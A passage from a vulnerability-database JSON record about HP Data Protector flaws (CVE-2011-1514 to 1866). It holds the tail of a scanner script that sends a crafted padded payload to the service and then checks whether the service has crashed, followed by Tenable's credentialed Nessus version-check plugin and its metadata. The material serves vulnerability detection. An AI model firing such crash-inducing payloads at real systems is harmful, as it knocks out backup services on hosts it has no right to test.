0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00 );\n\nreq = headdata + middata + lastdata;\n\nsend( socket:soc, data:req );\n\nclose( soc );\n\nsleep( 5 );\n\nsoc = open_sock_tcp( port );\nif( ! 
soc ) {\n security_message( port:port );\n exit( 0 );\n} else {\n response = recv( socket:soc, length:4096, timeout:20 );\n if( \"HP Data Protector\" >!< response && \"HPE Data Protector\" >!< response && \"HP OpenView Storage Data Protector\" >!< response ) {\n security_message( port:port );\n exit( 0 );\n }\n}\n\nclose( soc );\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T03:15:31", "description": "The version of HP Data Protector installed on the remote Windows host\nis affected by one or more of the following vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist in the\n 'data protector inet' service. (CVE-2011-1514, \n CVE-2011-1515)\n\n - A buffer overflow vulnerability exists in the 'data\n protector inet' service that can be exploited via \n EXEC_CMD. (CVE-2011-1864)\n\n - A buffer overflow vulnerability exists in the inet\n service that could result in code execution via a \n request containing crafted parameters. 
(CVE-2011-1865)", "edition": 26, "published": "2011-07-11T00:00:00", "title": "HP Data Protector <= A.06.20 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1864", "CVE-2011-1866"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:storage_data_protector"], "id": "HP_DATA_PROTECTOR_0620_MULTIPLE_VULNS_CREDS.NASL", "href": "https://www.tenable.com/plugins/nessus/55551", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55551);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2011-1514\",\n \"CVE-2011-1515\",\n \"CVE-2011-1865\", \n \"CVE-2011-1866\"\n );\n script_bugtraq_id(48486, 48488);\n script_xref(name:\"Secunia\", value:\"45100\");\n\n script_name(english:\"HP Data Protector <= A.06.20 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks if encrypted control communication services are enabled.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP Data Protector installed on the remote Windows host\nis affected by one or more of the following vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist in the\n 'data protector inet' service. (CVE-2011-1514, \n CVE-2011-1515)\n\n - A buffer overflow vulnerability exists in the 'data\n protector inet' service that can be exploited via \n EXEC_CMD. (CVE-2011-1864)\n\n - A buffer overflow vulnerability exists in the inet\n service that could result in code execution via a \n request containing crafted parameters. 
(CVE-2011-1865)\");\n\n # http://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d655681\");\n # http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79bee660\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e38ce76\");\n script_set_attribute(attribute:\"solution\", value:\n\"1. Upgrade to Data Protector A.06.20 or later and\n\n2. Enable encrypted control communication services on cell server and\n all clients in cell.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-12-076\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe Opcode 20 Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/06/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:storage_data_protector\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_data_protector_installed_local.nasl\");\n script_require_keys(\"SMB/HP Data Protector/Version\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit('SMB/HP Data Protector/Version');\nencrypted_comm = get_kb_item_or_exit('SMB/HP Data Protector/Encrypted');\nverui = get_kb_item('SMB/HP Data Protector/VersionUI');\ntype = get_kb_item('SMB/HP Data Protector/Type');\npath = get_kb_item('SMB/HP Data Protector/Path');\n\nif (encrypted_comm) encrypted_comm = 'True';\nelse encrypted_comm = 'False';\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n ver[0] < 6 || \n (ver[0] == 6 && ver[1] < 20) ||\n (ver[0] == 6 && ver[1] == 20 && encrypted_comm == 'False')\n)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Path : ' + path + \n '\\n Install type : ' + type +\n '\\n Encryption : ' + encrypted_comm + \n '\\n Installed version : ' + verui +\n '\\n Fixed version : A.06.20 with encrypted control communications services \\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n exit(0);\n}\nelse exit(0, 'The HP Data Protector '+verui+' install is not affected.');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
